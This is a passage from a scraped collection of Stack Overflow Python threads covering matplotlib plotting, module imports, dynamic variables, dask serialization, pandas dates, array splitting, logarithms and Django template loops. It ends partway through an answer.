Q: How to Plot Implicit Equation in Python I want to Plot V(y axis) vs t(x axis) graph using the below equation at 5 different values of L(shown below) L= [5,10,15,20,25] b=0.0032 Equation, (b*V*0.277*t) - (b*L) = log(1+b*V*0.277*t) code output will be as shown in figure Expected Outcome A: While sympy exposes the plot_implicit function, the results are far from good. We can use Numpy and Matplotlib to achieve our goal. The basic idea is that your equation can be written as LHS - RHS = 0. So, we can create contour plots and select the level 0. But contour plots uses colormaps, so we will have to create solid colormaps: import matplotlib.pyplot as plt import matplotlib.cm as cm from matplotlib.lines import Line2D from matplotlib.colors import ListedColormap import numpy as np Lvalues = [5,10,15,20,25] bval = 0.0032 V = np.linspace(0, 1000) t = np.linspace(0, 10) V, t = np.meshgrid(V, t) f = lambda V, t, b, L: b*V*0.277*t - b*L - np.log(1+b*V*0.277*t) colors = cm.tab10.colors handles = [] fig, ax = plt.subplots() for L, c in zip(Lvalues, colors): cmap = ListedColormap([c, c]) z = f(V, t, bval, L) ax.contour(t, V, z, levels=[0], cmap=cmap) handles.append(Line2D([], [], color=c, label="L = %s" % L)) ax.legend(handles=handles) plt.show()
How to Plot Implicit Equation in Python
I want to Plot V(y axis) vs t(x axis) graph using the below equation at 5 different values of L(shown below) L= [5,10,15,20,25] b=0.0032 Equation, (b*V*0.277*t) - (b*L) = log(1+b*V*0.277*t) code output will be as shown in figure Expected Outcome
[ "While sympy exposes the plot_implicit function, the results are far from good. We can use Numpy and Matplotlib to achieve our goal.\nThe basic idea is that your equation can be written as LHS - RHS = 0. So, we can create contour plots and select the level 0. But contour plots uses colormaps, so we will have to create solid colormaps:\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nfrom matplotlib.lines import Line2D\nfrom matplotlib.colors import ListedColormap\nimport numpy as np\n\nLvalues = [5,10,15,20,25]\nbval = 0.0032\n\nV = np.linspace(0, 1000)\nt = np.linspace(0, 10)\nV, t = np.meshgrid(V, t)\nf = lambda V, t, b, L: b*V*0.277*t - b*L - np.log(1+b*V*0.277*t)\n\ncolors = cm.tab10.colors\nhandles = []\nfig, ax = plt.subplots()\nfor L, c in zip(Lvalues, colors):\n cmap = ListedColormap([c, c])\n z = f(V, t, bval, L)\n ax.contour(t, V, z, levels=[0], cmap=cmap)\n handles.append(Line2D([], [], color=c, label=\"L = %s\" % L))\nax.legend(handles=handles)\nplt.show()\n\n\n" ]
[ 2 ]
[]
[]
[ "equation", "implicit", "matplotlib", "python", "sympy" ]
stackoverflow_0074575607_equation_implicit_matplotlib_python_sympy.txt
Q: Acessing for loop varible in another python script I have the file name as file1.py the code is following. ` import os global x def a_function(): while True: for x in range(12): cmd=f'rosbag record -O /home/mubashir/catkin_ws/src/germany1_trush/rosbag/{x}.bag /web_cam --duration 5 ' os.system(cmd) a_function() I want to acess x in another python scriptfile2.py` the code is following from file1 import x print(x) but the problem is file1.py executed when i run file2.py. I want only x to be printed in file2.py Can not acessing global variable in another python script. A: In order to correct this, add an if statement to check if the file1.py itself is being run. If it is, then __name__ should equal '__main__'. The code that you want to be read by file2.py should be outside the if statement and all code that you want to execute only if file1.py is run should be inside the if statement. For example: import os global x if __name__ == '__main__': def a_function(): while True: for x in range(12): cmd=f'rosbag record -O /home/mubashir/catkin_ws/src/germany1_trush/rosbag/{x}.bag /web_cam --duration 5 ' os.system(cmd) a_function()
Acessing for loop varible in another python script
I have the file name as file1.py the code is following. ` import os global x def a_function(): while True: for x in range(12): cmd=f'rosbag record -O /home/mubashir/catkin_ws/src/germany1_trush/rosbag/{x}.bag /web_cam --duration 5 ' os.system(cmd) a_function() I want to acess x in another python scriptfile2.py` the code is following from file1 import x print(x) but the problem is file1.py executed when i run file2.py. I want only x to be printed in file2.py Can not acessing global variable in another python script.
[ "In order to correct this, add an if statement to check if the file1.py itself is being run. If it is, then __name__ should equal '__main__'.\nThe code that you want to be read by file2.py should be outside the if statement and all code that you want to execute only if file1.py is run should be inside the if statement. For example:\nimport os\n\nglobal x\n\nif __name__ == '__main__':\n def a_function():\n while True:\n for x in range(12):\n\n cmd=f'rosbag record -O /home/mubashir/catkin_ws/src/germany1_trush/rosbag/{x}.bag /web_cam --duration 5 '\n os.system(cmd)\n\n a_function()\n\n" ]
[ 0 ]
[]
[]
[ "global", "loops", "module", "python", "scope" ]
stackoverflow_0074575586_global_loops_module_python_scope.txt
Q: Hiding axis text in matplotlib plots I'm trying to plot a figure without tickmarks or numbers on either of the axes (I use axes in the traditional sense, not the matplotlib nomenclature!). An issue I have come across is where matplotlib adjusts the x(y)ticklabels by subtracting a value N, then adds N at the end of the axis. This may be vague, but the following simplified example highlights the issue, with '6.18' being the offending value of N: import matplotlib.pyplot as plt import random prefix = 6.18 rx = [prefix+(0.001*random.random()) for i in arange(100)] ry = [prefix+(0.001*random.random()) for i in arange(100)] plt.plot(rx,ry,'ko') frame1 = plt.gca() for xlabel_i in frame1.axes.get_xticklabels(): xlabel_i.set_visible(False) xlabel_i.set_fontsize(0.0) for xlabel_i in frame1.axes.get_yticklabels(): xlabel_i.set_fontsize(0.0) xlabel_i.set_visible(False) for tick in frame1.axes.get_xticklines(): tick.set_visible(False) for tick in frame1.axes.get_yticklines(): tick.set_visible(False) plt.show() The three things I would like to know are: How to turn off this behaviour in the first place (although in most cases it is useful, it is not always!) I have looked through matplotlib.axis.XAxis and cannot find anything appropriate How can I make N disappear (i.e. X.set_visible(False)) Is there a better way to do the above anyway? My final plot would be 4x4 subplots in a figure, if that is relevant. A: Instead of hiding each element, you can hide the whole axis: frame1.axes.get_xaxis().set_visible(False) frame1.axes.get_yaxis().set_visible(False) Or, you can set the ticks to an empty list: frame1.axes.get_xaxis().set_ticks([]) frame1.axes.get_yaxis().set_ticks([]) In this second option, you can still use plt.xlabel() and plt.ylabel() to add labels to the axes. A: If you want to hide just the axis text keeping the grid lines: frame1 = plt.gca() frame1.axes.xaxis.set_ticklabels([]) frame1.axes.yaxis.set_ticklabels([]) Doing set_visible(False) or set_ticks([]) will also hide the grid lines. A: If you are like me and don't always retrieve the axes, ax, when plotting the figure, then a simple solution would be to do plt.xticks([]) plt.yticks([]) A: I've colour coded this figure to ease the process. import matplotlib.pyplot as plt fig = plt.figure() ax = fig.add_subplot(111) You can have full control over the figure using these commands, to complete the answer I've add also the control over the splines: ax.spines['top'].set_visible(False) ax.spines['right'].set_visible(False) # X AXIS -BORDER ax.spines['bottom'].set_visible(False) # BLUE ax.set_xticklabels([]) # RED ax.set_xticks([]) # RED AND BLUE TOGETHER ax.axes.get_xaxis().set_visible(False) # Y AXIS -BORDER ax.spines['left'].set_visible(False) # YELLOW ax.set_yticklabels([]) # GREEN ax.set_yticks([]) # YELLOW AND GREEN TOGHETHER ax.axes.get_yaxis().set_visible(False) A: I was not actually able to render an image without borders or axis data based on any of the code snippets here (even the one accepted at the answer). After digging through some API documentation, I landed on this code to render my image plt.axis('off') plt.tick_params(axis='both', left=False, top=False, right=False, bottom=False, labelleft=False, labeltop=False, labelright=False, labelbottom=False) plt.savefig('foo.png', dpi=100, bbox_inches='tight', pad_inches=0.0) I used the tick_params call to basically shut down any extra information that might be rendered and I have a perfect graph in my output file. A: Somewhat of an old thread but, this seems to be a faster method using the latest version of matplotlib: set the major formatter for the x-axis ax.xaxis.set_major_formatter(plt.NullFormatter()) A: One trick could be setting the color of tick labels as white to hide it! plt.xticks(color='w') plt.yticks(color='w') or to be more generalized (@Armin Okić), you can set it as "None". A: When using the object oriented API, the Axes object has two useful methods for removing the axis text, set_xticklabels() and set_xticks(). Say you create a plot using fig, ax = plt.subplots(1) ax.plot(x, y) If you simply want to remove the tick labels, you could use ax.set_xticklabels([]) or to remove the ticks completely, you could use ax.set_xticks([]) These methods are useful for specifying exactly where you want the ticks and how you want them labeled. Passing an empty list results in no ticks, or no labels, respectively. A: You could simply set xlabel to None, straight in your axis. Below an working example using seaborn from matplotlib import pyplot as plt import seaborn as sns tips = sns.load_dataset("tips") ax = sns.boxplot(x="day", y="total_bill", data=tips) ax.set(xlabel=None) plt.show() A: Just do this in case you have subplots fig, axs = plt.subplots(1, 2, figsize=(16, 8)) ax[0].set_yticklabels([]) # x-axis ax[0].set_xticklabels([]) # y-axis
Hiding axis text in matplotlib plots
I'm trying to plot a figure without tickmarks or numbers on either of the axes (I use axes in the traditional sense, not the matplotlib nomenclature!). An issue I have come across is where matplotlib adjusts the x(y)ticklabels by subtracting a value N, then adds N at the end of the axis. This may be vague, but the following simplified example highlights the issue, with '6.18' being the offending value of N: import matplotlib.pyplot as plt import random prefix = 6.18 rx = [prefix+(0.001*random.random()) for i in arange(100)] ry = [prefix+(0.001*random.random()) for i in arange(100)] plt.plot(rx,ry,'ko') frame1 = plt.gca() for xlabel_i in frame1.axes.get_xticklabels(): xlabel_i.set_visible(False) xlabel_i.set_fontsize(0.0) for xlabel_i in frame1.axes.get_yticklabels(): xlabel_i.set_fontsize(0.0) xlabel_i.set_visible(False) for tick in frame1.axes.get_xticklines(): tick.set_visible(False) for tick in frame1.axes.get_yticklines(): tick.set_visible(False) plt.show() The three things I would like to know are: How to turn off this behaviour in the first place (although in most cases it is useful, it is not always!) I have looked through matplotlib.axis.XAxis and cannot find anything appropriate How can I make N disappear (i.e. X.set_visible(False)) Is there a better way to do the above anyway? My final plot would be 4x4 subplots in a figure, if that is relevant.
[ "Instead of hiding each element, you can hide the whole axis:\nframe1.axes.get_xaxis().set_visible(False)\nframe1.axes.get_yaxis().set_visible(False)\n\nOr, you can set the ticks to an empty list:\nframe1.axes.get_xaxis().set_ticks([])\nframe1.axes.get_yaxis().set_ticks([])\n\nIn this second option, you can still use plt.xlabel() and plt.ylabel() to add labels to the axes.\n", "If you want to hide just the axis text keeping the grid lines:\nframe1 = plt.gca()\nframe1.axes.xaxis.set_ticklabels([])\nframe1.axes.yaxis.set_ticklabels([])\n\nDoing set_visible(False) or set_ticks([]) will also hide the grid lines.\n", "If you are like me and don't always retrieve the axes, ax, when plotting the figure, then a simple solution would be to do \nplt.xticks([])\nplt.yticks([])\n\n", "I've colour coded this figure to ease the process.\nimport matplotlib.pyplot as plt\nfig = plt.figure()\nax = fig.add_subplot(111)\n\n\nYou can have full control over the figure using these commands, to complete the answer I've add also the control over the splines:\nax.spines['top'].set_visible(False)\nax.spines['right'].set_visible(False)\n\n# X AXIS -BORDER\nax.spines['bottom'].set_visible(False)\n# BLUE\nax.set_xticklabels([])\n# RED\nax.set_xticks([])\n# RED AND BLUE TOGETHER\nax.axes.get_xaxis().set_visible(False)\n\n# Y AXIS -BORDER\nax.spines['left'].set_visible(False)\n# YELLOW\nax.set_yticklabels([])\n# GREEN\nax.set_yticks([])\n# YELLOW AND GREEN TOGHETHER\nax.axes.get_yaxis().set_visible(False)\n\n", "I was not actually able to render an image without borders or axis data based on any of the code snippets here (even the one accepted at the answer). After digging through some API documentation, I landed on this code to render my image\nplt.axis('off')\nplt.tick_params(axis='both', left=False, top=False, right=False, bottom=False, labelleft=False, labeltop=False, labelright=False, labelbottom=False)\nplt.savefig('foo.png', dpi=100, bbox_inches='tight', pad_inches=0.0)\n\nI used the tick_params call to basically shut down any extra information that might be rendered and I have a perfect graph in my output file.\n", "Somewhat of an old thread but, this seems to be a faster method using the latest version of matplotlib:\nset the major formatter for the x-axis\nax.xaxis.set_major_formatter(plt.NullFormatter())\n\n", "One trick could be setting the color of tick labels as white to hide it!\nplt.xticks(color='w')\nplt.yticks(color='w')\n\nor to be more generalized (@Armin Okić), you can set it as \"None\".\n", "When using the object oriented API, the Axes object has two useful methods for removing the axis text, set_xticklabels() and set_xticks().\nSay you create a plot using \nfig, ax = plt.subplots(1)\nax.plot(x, y)\n\nIf you simply want to remove the tick labels, you could use\nax.set_xticklabels([])\n\nor to remove the ticks completely, you could use\nax.set_xticks([])\n\nThese methods are useful for specifying exactly where you want the ticks and how you want them labeled. Passing an empty list results in no ticks, or no labels, respectively.\n", "You could simply set xlabel to None, straight in your axis. Below an working example using seaborn\nfrom matplotlib import pyplot as plt\nimport seaborn as sns\n\ntips = sns.load_dataset(\"tips\")\n\nax = sns.boxplot(x=\"day\", y=\"total_bill\", data=tips)\nax.set(xlabel=None)\n\nplt.show()\n\n", "Just do this in case you have subplots\nfig, axs = plt.subplots(1, 2, figsize=(16, 8))\n\nax[0].set_yticklabels([]) # x-axis\nax[0].set_xticklabels([]) # y-axis\n\n" ]
[ 625, 283, 211, 121, 85, 66, 18, 15, 3, 0 ]
[]
[]
[ "matplotlib", "plot", "python" ]
stackoverflow_0002176424_matplotlib_plot_python.txt
Q: How do I create and access variables algorithmically? I'm trying to assign and reference variables algorithmically. See below: varName = "a0" value = 1 globals()[varName] = value print(varName) print(a0) This returns: a0 1 So, the variable varName is "a0", which is right. And the variable a0 is 1, which is also right. But I want varName to output 1 directly instead of "a0". How do I connect them as such?
How do I create and access variables algorithmically?
I'm trying to assign and reference variables algorithmically. See below: varName = "a0" value = 1 globals()[varName] = value print(varName) print(a0) This returns: a0 1 So, the variable varName is "a0", which is right. And the variable a0 is 1, which is also right. But I want varName to output 1 directly instead of "a0". How do I connect them as such?
[]
[]
[ "To get the value of varName you can use eval function.\nvarName = \"a0\"\nvalue = 1\n\nglobals()[varName] = value\n\n# eval function here\nprint(eval(varName))\nprint(a0)\n\nOutput:\n1\n1\n\n" ]
[ -1 ]
[ "python" ]
stackoverflow_0074576226_python.txt
Q: dask.distributed: handle serialization of exotic objects? Context I am trying to write a data pipeline using dask distributed and some legacy code from a previous project. get_data simply get url:str and session:ClientSession as arguments and return a pandas DataFrame. from dask.distributed import Client from aiohttp import ClientSession client = Client() session: ClientSession = connector.session_factory() futures = client.map( get_data, # function to get data (takes url and http session) urls, [session for _ in range(len(urls))], # PROBLEM IS HERE retries=5, ) r = client.map(loader.job, futures) _ = client.gather(r) Problem I get the following error File "/home/zar3bski/.cache/pypoetry/virtualenvs/poc-dask-iG-N0GH5-py3.10/lib/python3.10/site-packages/distributed/worker.py", line 2952, in warn_dumps b = dumps(obj) File "/home/zar3bski/.cache/pypoetry/virtualenvs/poc-dask-iG-N0GH5-py3.10/lib/python3.10/site-packages/distributed/protocol/pickle.py", line 58, in dumps result = cloudpickle.dumps(x, **dump_kwargs) File "/home/zar3bski/.cache/pypoetry/virtualenvs/poc-dask-iG-N0GH5-py3.10/lib/python3.10/site-packages/cloudpickle/cloudpickle_fast.py", line 73, in dumps cp.dump(obj) File "/home/zar3bski/.cache/pypoetry/virtualenvs/poc-dask-iG-N0GH5-py3.10/lib/python3.10/site-packages/cloudpickle/cloudpickle_fast.py", line 632, in dump return Pickler.dump(self, obj) TypeError: cannot pickle 'TaskStepMethWrapper' object Unclosed client session client_session: <aiohttp.client.ClientSession object at 0x7f3042b2fa00> My temptation was then to register a serializer and a deserializer for this exotic object following this doc from distributed.protocol import dask_serialize, dask_deserialize @dask_serialize.register(TaskStepMethWrapper) def serialize(ctx: TaskStepMethWrapper) -> Tuple[Dict, List[bytes]]: header = {} #? frames = [] #? return header, frames @dask_deserialize.register(TaskStepMethWrapper) def deserialize(header: Dict, frames: List[bytes]) -> TaskStepMethWrapper: return TaskStepMethWrapper(frames) #? The problem is that I don't know where to load TaskStepMethWrapper from. I know that class TaskStepMethWrapper is asyncio related grep -rnw './' -e '.*TaskStepMethWrapper.*' grep: ./lib-dynload/_asyncio.cpython-310-x86_64-linux-gnu.so : fichiers binaires correspondent But I couldn't find its definition anywhere in site-packages/aiohttp. I also tried to use a Client(asynchronous=True) with only resulted in a TypeError: cannot pickle '_contextvars.Context' object. How do you handle exotic objects serializations in dask. Should I extend the dask serializer or use an additional serialization family? client = Client('tcp://scheduler-address:8786', serializers=['dask', 'pickle'], # BUT WHICH ONE deserializers=['dask', 'msgpack']) # BUT WHICH ONE A: There is a far easier to get around this: create your sessions within the mapped function. You would have been recreating the sessions in each worker anyway, they cannot survive a transfer from dask.distributed import Client from aiohttp import ClientSession client = Client() def func(u): session: ClientSession = connector.session_factory() return get_data(u, session) futures = client.map( func, urls, retries=5, ) (I don't know what loader.job is, so I have omitted that). Note that TaskStepMethWrapper (and anything to do with aiohttp) sounds like it should be called only in async code. Maybe func needs to be async and you need appropriate awaits.
dask.distributed: handle serialization of exotic objects?
Context I am trying to write a data pipeline using dask distributed and some legacy code from a previous project. get_data simply get url:str and session:ClientSession as arguments and return a pandas DataFrame. from dask.distributed import Client from aiohttp import ClientSession client = Client() session: ClientSession = connector.session_factory() futures = client.map( get_data, # function to get data (takes url and http session) urls, [session for _ in range(len(urls))], # PROBLEM IS HERE retries=5, ) r = client.map(loader.job, futures) _ = client.gather(r) Problem I get the following error File "/home/zar3bski/.cache/pypoetry/virtualenvs/poc-dask-iG-N0GH5-py3.10/lib/python3.10/site-packages/distributed/worker.py", line 2952, in warn_dumps b = dumps(obj) File "/home/zar3bski/.cache/pypoetry/virtualenvs/poc-dask-iG-N0GH5-py3.10/lib/python3.10/site-packages/distributed/protocol/pickle.py", line 58, in dumps result = cloudpickle.dumps(x, **dump_kwargs) File "/home/zar3bski/.cache/pypoetry/virtualenvs/poc-dask-iG-N0GH5-py3.10/lib/python3.10/site-packages/cloudpickle/cloudpickle_fast.py", line 73, in dumps cp.dump(obj) File "/home/zar3bski/.cache/pypoetry/virtualenvs/poc-dask-iG-N0GH5-py3.10/lib/python3.10/site-packages/cloudpickle/cloudpickle_fast.py", line 632, in dump return Pickler.dump(self, obj) TypeError: cannot pickle 'TaskStepMethWrapper' object Unclosed client session client_session: <aiohttp.client.ClientSession object at 0x7f3042b2fa00> My temptation was then to register a serializer and a deserializer for this exotic object following this doc from distributed.protocol import dask_serialize, dask_deserialize @dask_serialize.register(TaskStepMethWrapper) def serialize(ctx: TaskStepMethWrapper) -> Tuple[Dict, List[bytes]]: header = {} #? frames = [] #? return header, frames @dask_deserialize.register(TaskStepMethWrapper) def deserialize(header: Dict, frames: List[bytes]) -> TaskStepMethWrapper: return TaskStepMethWrapper(frames) #? The problem is that I don't know where to load TaskStepMethWrapper from. I know that class TaskStepMethWrapper is asyncio related grep -rnw './' -e '.*TaskStepMethWrapper.*' grep: ./lib-dynload/_asyncio.cpython-310-x86_64-linux-gnu.so : fichiers binaires correspondent But I couldn't find its definition anywhere in site-packages/aiohttp. I also tried to use a Client(asynchronous=True) with only resulted in a TypeError: cannot pickle '_contextvars.Context' object. How do you handle exotic objects serializations in dask. Should I extend the dask serializer or use an additional serialization family? client = Client('tcp://scheduler-address:8786', serializers=['dask', 'pickle'], # BUT WHICH ONE deserializers=['dask', 'msgpack']) # BUT WHICH ONE
[ "There is a far easier to get around this: create your sessions within the mapped function. You would have been recreating the sessions in each worker anyway, they cannot survive a transfer\nfrom dask.distributed import Client\nfrom aiohttp import ClientSession\nclient = Client()\n\ndef func(u):\n session: ClientSession = connector.session_factory()\n return get_data(u, session)\n\nfutures = client.map(\n func,\n urls,\n retries=5,\n)\n\n(I don't know what loader.job is, so I have omitted that).\nNote that TaskStepMethWrapper (and anything to do with aiohttp) sounds like it should be called only in async code. Maybe func needs to be async and you need appropriate awaits.\n" ]
[ 1 ]
[]
[]
[ "dask", "dask_distributed", "python", "serialization" ]
stackoverflow_0074573626_dask_dask_distributed_python_serialization.txt
Q: How to normalise a date columnin pandas dataframe to the same format I have a dataframe made from pulling in different excel sheets. I am trying to normalise the date_time column to just a standard DD/MM/YYY format. Is that possible? 1 DATE Column 3 Column 4 Column 5 Column 6 2 01/03/2021 00:00 3 01/03/2021 00:00 4 01/03/2021 00:00 5 01/03/2021 00:00 6 01/03/2021 00:00 ... ... 122350 11/24/2022 122351 11/24/2022 122352 11/24/2022 122353 11/24/2022 122354 11/24/2022 A: # example df df = pd.DataFrame({'DATE': ['01/03/2021 00:00', '01/03/2021 00:00', '01/03/2021 00:00', '01/03/2021 00:00', '01/03/2021 00:00', '11/24/2022', '11/24/2022', '11/24/2022', '11/24/2022', '11/24/2022']}) df['DATE'] = pd.to_datetime(df['DATE']) df['DATE'] = df['DATE'].dt.strftime('%d/%m/%Y') output: > df DATE 0 03/01/2021 1 03/01/2021 2 03/01/2021 3 03/01/2021 4 03/01/2021 5 24/11/2022 6 24/11/2022 7 24/11/2022 8 24/11/2022 9 24/11/2022
How to normalise a date columnin pandas dataframe to the same format
I have a dataframe made from pulling in different excel sheets. I am trying to normalise the date_time column to just a standard DD/MM/YYY format. Is that possible? 1 DATE Column 3 Column 4 Column 5 Column 6 2 01/03/2021 00:00 3 01/03/2021 00:00 4 01/03/2021 00:00 5 01/03/2021 00:00 6 01/03/2021 00:00 ... ... 122350 11/24/2022 122351 11/24/2022 122352 11/24/2022 122353 11/24/2022 122354 11/24/2022
[ "# example df\ndf = pd.DataFrame({'DATE': ['01/03/2021 00:00', '01/03/2021 00:00', '01/03/2021 00:00', '01/03/2021 00:00', '01/03/2021 00:00', '11/24/2022', '11/24/2022', '11/24/2022', '11/24/2022', '11/24/2022']})\ndf['DATE'] = pd.to_datetime(df['DATE'])\ndf['DATE'] = df['DATE'].dt.strftime('%d/%m/%Y')\n\noutput:\n> df\n\n DATE\n0 03/01/2021\n1 03/01/2021\n2 03/01/2021\n3 03/01/2021\n4 03/01/2021\n5 24/11/2022\n6 24/11/2022\n7 24/11/2022\n8 24/11/2022\n9 24/11/2022\n\n" ]
[ 1 ]
[]
[]
[ "excel", "pandas", "python" ]
stackoverflow_0074576304_excel_pandas_python.txt
Q: Splitting arrays in Python I have the following problem: I would like to find different "cuts" of the array into two different arrays by adding one element each time, for example: If I have an array a = [0,1,2,3] The following splits are desired: [0] [1,2,3] [0,1] [2,3] [0,1,2] [3] In the past I had easier tasks so np.split() function was quite enough for me. How should I act in this particular case? Many thanks in advance and apologies if this question was asked before. A: Use slicing, more details : Understanding slicing. a = [0,1,2,3] for i in range(len(a)-1): print(a[:i+1], a[i+1:]) Output: [0] [1, 2, 3] [0, 1] [2, 3] [0, 1, 2] [3] A: Check this out: a = [0,1,2,3] result = [(a[:x], a[x:]) for x in range(1, len(a))] print(result) # [([0], [1, 2, 3]), ([0, 1], [2, 3]), ([0, 1, 2], [3])] # you can access result like normal list print(result[0]) # ([0], [1, 2, 3])
Splitting arrays in Python
I have the following problem: I would like to find different "cuts" of the array into two different arrays by adding one element each time, for example: If I have an array a = [0,1,2,3] The following splits are desired: [0] [1,2,3] [0,1] [2,3] [0,1,2] [3] In the past I had easier tasks so np.split() function was quite enough for me. How should I act in this particular case? Many thanks in advance and apologies if this question was asked before.
[ "Use slicing, more details : Understanding slicing.\na = [0,1,2,3]\n\nfor i in range(len(a)-1):\n print(a[:i+1], a[i+1:])\n\nOutput:\n[0] [1, 2, 3]\n[0, 1] [2, 3]\n[0, 1, 2] [3]\n\n", "Check this out:\na = [0,1,2,3]\n\nresult = [(a[:x], a[x:]) for x in range(1, len(a))]\n\nprint(result)\n# [([0], [1, 2, 3]), ([0, 1], [2, 3]), ([0, 1, 2], [3])]\n\n# you can access result like normal list\nprint(result[0])\n# ([0], [1, 2, 3])\n\n" ]
[ 2, 1 ]
[]
[]
[ "arrays", "python" ]
stackoverflow_0074576364_arrays_python.txt
Q: the log in math library does not work for me i have been trying to get log to work but it just doesnt get the same value as you would get with a calculator. i tried these but none work; i want to calculate for example 600 log 600 but never has that actual value. the only difference between the below codes is they calulate worst_mergesort defferently: rows * math.log(rows) math.log(rows) math.log(rows, rows) # import the math module for calulations involving logarithm import math # ask the user how many rows the table has rows: int = int(input('how many rows does the table have?')) def which_sort(rows: int) -> str: """ This function first calculates the worst times for both quicksort and merge sort. if mergesort is at least 100 times faster then quick sort it uses mergesort, otherwise quicksort. :param: rows - an integer that counts the amount of rows in a table. """ # if rows is <= 1 worst_mergesort would be 0 resulting in a zerodevision error if rows <= 1: return 'use quicksort' # calculate the worst possible outcomes worst_quicksort: int = rows**2 worst_mergesort: int = math.log(rows) print(worst_mergesort) print(rows) # checks wether the worst of merge sort is 100 faster then the worst of quick sort if worst_mergesort <= (worst_quicksort / 100): return 'use merge sort' else: return 'use quick sort' which_sort(rows) # import the math module for calulations involving logarithm import math # ask the user how many rows the table has rows: int = int(input('how many rows does the table have?')) def which_sort(rows: int) -> str: """ This function first calculates the worst times for both quicksort and merge sort. if mergesort is at least 100 times faster then quick sort it uses mergesort, otherwise quicksort. :param: rows - an integer that counts the amount of rows in a table. """ # if rows is <= 1 worst_mergesort would be 0 resulting in a zerodevision error if rows <= 1: return 'use quicksort' # calculate the worst possible outcomes worst_quicksort: int = rows**2 worst_mergesort: int = math.log(rows, rows) print(worst_mergesort) print(rows) # checks wether the worst of merge sort is 100 faster then the worst of quick sort if worst_mergesort <= (worst_quicksort / 100): return 'use merge sort' else: return 'use quick sort' which_sort(rows) # import the math module for calulations involving logarithm import math # ask the user how many rows the table has rows: int = int(input('how many rows does the table have?')) def which_sort(rows: int) -> str: """ This function first calculates the worst times for both quicksort and merge sort. if mergesort is at least 100 times faster then quick sort it uses mergesort, otherwise quicksort. :param: rows - an integer that counts the amount of rows in a table. """ # if rows is <= 1 worst_mergesort would be 0 resulting in a zerodevision error if rows <= 1: return 'use quicksort' # calculate the worst possible outcomes worst_quicksort: int = rows**2 worst_mergesort: int = rows * math.log(rows) print(worst_mergesort) print(rows) # checks wether the worst of merge sort is 100 faster then the worst of quick sort if worst_mergesort <= (worst_quicksort / 100): return 'use merge sort' else: return 'use quick sort' which_sort(rows) A: I think the problem is simply that the base of the logarithm is different in math.log than in a calculator. math.log computes the natural logarithm, so the base is e and the calculators usually use base 10 by default. In math.log, you can specify the base as a second argument e.g. 600*math.log(600, 10) should give you the expected answer.
the log in math library does not work for me
i have been trying to get log to work but it just doesnt get the same value as you would get with a calculator. i tried these but none work; i want to calculate for example 600 log 600 but never has that actual value. the only difference between the below codes is they calulate worst_mergesort defferently: rows * math.log(rows) math.log(rows) math.log(rows, rows) # import the math module for calulations involving logarithm import math # ask the user how many rows the table has rows: int = int(input('how many rows does the table have?')) def which_sort(rows: int) -> str: """ This function first calculates the worst times for both quicksort and merge sort. if mergesort is at least 100 times faster then quick sort it uses mergesort, otherwise quicksort. :param: rows - an integer that counts the amount of rows in a table. """ # if rows is <= 1 worst_mergesort would be 0 resulting in a zerodevision error if rows <= 1: return 'use quicksort' # calculate the worst possible outcomes worst_quicksort: int = rows**2 worst_mergesort: int = math.log(rows) print(worst_mergesort) print(rows) # checks wether the worst of merge sort is 100 faster then the worst of quick sort if worst_mergesort <= (worst_quicksort / 100): return 'use merge sort' else: return 'use quick sort' which_sort(rows) # import the math module for calulations involving logarithm import math # ask the user how many rows the table has rows: int = int(input('how many rows does the table have?')) def which_sort(rows: int) -> str: """ This function first calculates the worst times for both quicksort and merge sort. if mergesort is at least 100 times faster then quick sort it uses mergesort, otherwise quicksort. :param: rows - an integer that counts the amount of rows in a table. """ # if rows is <= 1 worst_mergesort would be 0 resulting in a zerodevision error if rows <= 1: return 'use quicksort' # calculate the worst possible outcomes worst_quicksort: int = rows**2 worst_mergesort: int = math.log(rows, rows) print(worst_mergesort) print(rows) # checks wether the worst of merge sort is 100 faster then the worst of quick sort if worst_mergesort <= (worst_quicksort / 100): return 'use merge sort' else: return 'use quick sort' which_sort(rows) # import the math module for calulations involving logarithm import math # ask the user how many rows the table has rows: int = int(input('how many rows does the table have?')) def which_sort(rows: int) -> str: """ This function first calculates the worst times for both quicksort and merge sort. if mergesort is at least 100 times faster then quick sort it uses mergesort, otherwise quicksort. :param: rows - an integer that counts the amount of rows in a table. """ # if rows is <= 1 worst_mergesort would be 0 resulting in a zerodevision error if rows <= 1: return 'use quicksort' # calculate the worst possible outcomes worst_quicksort: int = rows**2 worst_mergesort: int = rows * math.log(rows) print(worst_mergesort) print(rows) # checks wether the worst of merge sort is 100 faster then the worst of quick sort if worst_mergesort <= (worst_quicksort / 100): return 'use merge sort' else: return 'use quick sort' which_sort(rows)
[ "I think the problem is simply that the base of the logarithm is different in math.log than in a calculator.\nmath.log computes the natural logarithm, so the base is e and the calculators usually use base 10 by default.\nIn math.log, you can specify the base as a second argument e.g. 600*math.log(600, 10) should give you the expected answer.\n" ]
[ 1 ]
[]
[]
[ "logarithm", "math", "python" ]
stackoverflow_0074576392_logarithm_math_python.txt
Q: how to iterate through dictionary in a dictionary in django template? My dictionary looks like this(Dictionary within a dictionary): {'0': { 'chosen_unit': <Unit: Kg>, 'cost': Decimal('10.0000'), 'unit__name_abbrev': u'G', 'supplier__supplier': u"Steve's Meat Locker", 'price': Decimal('5.00'), 'supplier__address': u'No\r\naddress here', 'chosen_unit_amount': u'2', 'city__name': u'Joburg, Central', 'supplier__phone_number': u'02299944444', 'supplier__website': None, 'supplier__price_list': u'', 'supplier__email': u'ss.sss@ssssss.com', 'unit__name': u'Gram', 'name': u'Rump Bone', }} Now I'm just trying to display the information on my template but I'm struggling. My code for the template looks like: {% if landing_dict.ingredients %} <hr> {% for ingredient in landing_dict.ingredients %} {{ ingredient }} {% endfor %} <a href="/">Print {{ landing_dict.recipe_name }}</a> {% else %} Please search for an ingredient below {% endif %} It just shows me '0' on my template? I also tried: {% for ingredient in landing_dict.ingredients %} {{ ingredient.cost }} {% endfor %} This doesn't even display a result. I thought perhaps I need to iterate one level deeper so tried this: {% if landing_dict.ingredients %} <hr> {% for ingredient in landing_dict.ingredients %} {% for field in ingredient %} {{ field }} {% endfor %} {% endfor %} <a href="/">Print {{ landing_dict.recipe_name }}</a> {% else %} Please search for an ingredient below {% endif %} But this doesn't display anything. What am I doing wrong? A: Lets say your data is - data = {'a': [ [1, 2] ], 'b': [ [3, 4] ],'c':[ [5,6]] } You can use the data.items() method to get the dictionary elements. Note, in django templates we do NOT put (). Also some users mentioned values[0] does not work, if that is the case then try values.items. <table> <tr> <td>a</td> <td>b</td> <td>c</td> </tr> {% for key, values in data.items %} <tr> <td>{{key}}</td> 